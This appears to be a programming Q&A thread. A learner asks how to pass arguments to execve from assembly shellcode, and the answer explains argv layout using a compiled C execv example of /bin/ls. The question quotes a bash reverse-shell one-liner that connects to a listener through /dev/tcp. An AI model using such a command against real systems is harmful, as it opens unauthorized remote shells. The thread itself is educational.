2

I'm having a go at learning assembly and writing shellcode. I have a question about execve and passing arguments to the program it will execute.

I have working code to execute a bash shell but am unsure of the input format of execve to pass additional arguments to it. Can I do stdin stdout redirects too? I wanted to create a reverse tcp connection with this type of command line:

/bin/bash -i >& /dev/tcp/192.168.1.4/1234 0>&1

Should the arguments be separated with NULL's? I got it to execute a shell but it didn't connect back to the listening nc.

I know this is an unusual way of doing this but I just wanted to try something different :-)

Cheers

Improve this question
0

1 Answer 1

Reset to default
1

The best way to know how to do is to compile an example and stop at assembly level. Lets take this example:

#include <unistd.h>

int
main ()
{
  char *program = "/bin/ls";
  char *args[3] = {"/bin/ls", "-l", "./"};

  execv(program, args);

  return 0;
}

When compiled with gcc -Wall -Wextra -S -o myexec.s myexec.c you can read in myexec.s:

        .file   "myexec.c"
        .section        .rodata
.LC0:
        .string "/bin/ls"
.LC1:
        .string "-l"
.LC2:
        .string "./"
        .text
        .globl  main
        .type   main, @function
main:
.LFB0:
        pushq   %rbp
        movq    %rsp, %rbp
        subq    $32, %rsp
        movq    $.LC0, -8(%rbp)
        movq    $.LC0, -32(%rbp)
        movq    $.LC1, -24(%rbp)
        movq    $.LC2, -16(%rbp)
        leaq    -32(%rbp), %rdx
        movq    -8(%rbp), %rax
        movq    %rdx, %rsi
        movq    %rax, %rdi
        call    execv
        movl    $0, %eax
        leave
        ret

So, the list of arguments of the command line is composed of a list of strings and, the first argument is the path to the executable file (-8(rbp)), then each argument is passed through a pointer to its string: argv[0] = -16(%rbp), argv[1] = -24(%rbp), argv[2] = -32(%rbp), ... and so on.

So, you just have to have the addresses of each string and stack it (in the proper order) onto the stack before calling execv.

Improve this answer
Sign up to request clarification or add additional context in comments.

2 Comments

Thanks mate. That has helped clear up things a bit for me. I am not familiar with 64 bit but the concept of each arg being passed as a pointer to it's string is what I wasn't sure of (each NULL terminated I guess). I'll have another go and I guess I'll find out if redirection works.
Well I re-wrote it and got it executing as it should but the redirection doesn't work as expected for some reason. I get -i: >&: no such file or directory.

Your Answer

By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.